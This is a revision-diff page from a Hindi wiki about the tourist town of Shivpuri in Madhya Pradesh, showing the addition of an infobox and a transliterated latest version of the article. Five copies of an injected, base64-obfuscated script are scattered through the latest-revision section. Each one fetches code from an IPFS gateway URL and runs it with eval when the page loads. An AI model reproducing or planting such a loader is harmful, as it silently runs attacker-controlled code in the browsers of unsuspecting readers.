Difference between revisions of "शिवपुरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
{{बहुविकल्प|बहुविकल्पी शब्द=शिवपुरी|लेख का नाम=शिवपुरी (बहुविकल्पी)}}
[[चित्र:Scindia-Chhatris-Shivpuri.jpg|thumb|250px|[[सिंधिया वंश]] की छतरियाँ, शिवपुरी]]
+
{{सूचना बक्सा पर्यटन
'''शिवपुरी''' [[मध्य प्रदेश]] राज्य के [[ग्वालियर]] शहर से 113 किमी की दूरी पर स्थित नगर है।  
+
|चित्र=Scindia-Chhatris-Shivpuri.jpg
*शिवपुरी की प्राकृतिक सुंदरता और सांस्कृतिक विरासत की झलक देखने के लिए यहाँ पर्यटक बड़ी संख्या में आते है।
+
|चित्र का नाम=शिवपुरी
*शिवपुरी में ग्वालियर के [[सिंधिया वंश]] की समर कैपिटल थी। वे शिवपुरी में गर्मियों के दिनों में यहाँ रहने के लिए आया करते थे।  
+
|विवरण=शिवपुरी प्रसिद्ध पर्यटन स्थलों में से एक है।
*शिवपुरी के घने जंगलों में मुगल सम्राट शिकार खेलने आते थे। [[अकबर]] ने यहीं से [[हाथी|हाथियों]] के विशाल झुंड और शेरों को पकड़ा था।  
+
|राज्य=[[मध्य प्रदेश]]
*शिवपुरी के इन घने जंगलों को अब अभ्यारण्य में तब्दील कर दिया गया है, जहाँ अनेक दुर्लभ पशु-पक्षियों और वनस्पतियों को देखा जा सकता है।  
+
|केन्द्र शासित प्रदेश=
*शिवपुरी में बने कुछ महल और [[झील|झीलें]] यहाँ आने वाले पर्यटकों के आकर्षण का केन्द्र रहती हैं।  
+
|ज़िला=[[ग्वालियर]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/place/Shivpuri,+Madhya+Pradesh+473551/@25.4333044,77.6290292,13z/data=!3m1!4b1!4m5!3m4!1s0x3970b95555322f1f:0x8d96b4e080b30b5c!8m2!3d25.4357869!4d77.665066?dcr=0 गूगल मानचित्र]
 +
|संबंधित लेख=[[सिंधिया वंश]], [[अकबर]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=शिवपुरी में बने कुछ महल और [[झील|झीलें]] यहाँ आने वाले पर्यटकों के आकर्षण का केन्द्र रहती हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन= 06:33, 10 सितम्बर 2017 (IST)
 +
}}
 +
'''शिवपुरी''' [[मध्य प्रदेश]] के [[ग्वालियर]] शहर से 113 कि.मी. की दूरी पर स्थित नगर है। इस नगर की प्राकृतिक सुंदरता और सांस्कृतिक विरासत की झलक देखने के लिए यहाँ पर्यटक बड़ी संख्या में आते हैं।
 +
 
 +
*इस नगर में ग्वालियर के [[सिंधिया वंश]] की ग्रीष्म कालीन राजधानी हुआ करती थी। वे शिवपुरी में गर्मियों के दिनों में यहाँ रहने के लिए आया करते थे।
 +
*शिवपुरी के घने जंगलों में [[मुग़ल]] सम्राट शिकार खेलने आते थे। [[अकबर]] ने यहीं से [[हाथी|हाथियों]] के विशाल झुंड और शेरों को पकड़ा था।
 +
*यहाँ के इन घने जंगलों को अब अभ्यारण्य में तब्दील कर दिया गया है, जहाँ अनेक दुर्लभ पशु-पक्षियों और वनस्पतियों को देखा जा सकता है।
 +
*शिवपुरी में बने कुछ महल और [[झील|झीलें]] यहाँ आने वाले पर्यटकों के आकर्षण का केन्द्र रहती हैं।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 16: Line 55:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{मध्य प्रदेश के नगर}}
+
{{मध्य प्रदेश के नगर}}{{मध्य प्रदेश के पर्यटन स्थल}}
{{मध्य प्रदेश के पर्यटन स्थल}}
+
[[Category:मध्य प्रदेश]][[Category:भारत के नगर]][[Category:मध्य प्रदेश के नगर]][[Category:मध्य प्रदेश के पर्यटन स्थल]]
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश के नगर]]
 
[[Category:मध्य प्रदेश के पर्यटन स्थल]]
 
[[Category:भारत के नगर]]
 
 
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 13:04, 10 September 2017

chitr:Disamb2.jpg shivapuri ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- shivapuri (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shivapuri
vivaran shivapuri prasiddh paryatan sthaloan mean se ek hai.
rajy madhy pradesh
zila gvaliyar
chitr:Map-icon.gif googal manachitr
sanbandhit lekh siandhiya vansh, akabar


any janakari shivapuri mean bane kuchh mahal aur jhilean yahaan ane vale paryatakoan ke akarshan ka kendr rahati haian.
adyatan‎ 06:33, 10 sitambar 2017 (IST)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shivapuri madhy pradesh ke gvaliyar shahar se 113 ki.mi. ki doori par sthit nagar hai. is nagar ki prakritik suandarata aur saanskritik virasat ki jhalak dekhane ke lie yahaan paryatak b di sankhya mean ate haian.

  • is nagar mean gvaliyar ke siandhiya vansh ki grishm kalin rajadhani hua karati thi. ve shivapuri mean garmiyoan ke dinoan mean yahaan rahane ke lie aya karate the.
  • shivapuri ke ghane jangaloan mean mugal samrat shikar khelane ate the. akabar ne yahian se hathiyoan ke vishal jhuand aur sheroan ko pak da tha.
  • yahaan ke in ghane jangaloan ko ab abhyarany mean tabdil kar diya gaya hai, jahaan anek durlabh pashu-pakshiyoan aur vanaspatiyoan ko dekha ja sakata hai.
  • shivapuri mean bane kuchh mahal aur jhilean yahaan ane vale paryatakoan ke akarshan ka kendr rahati haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>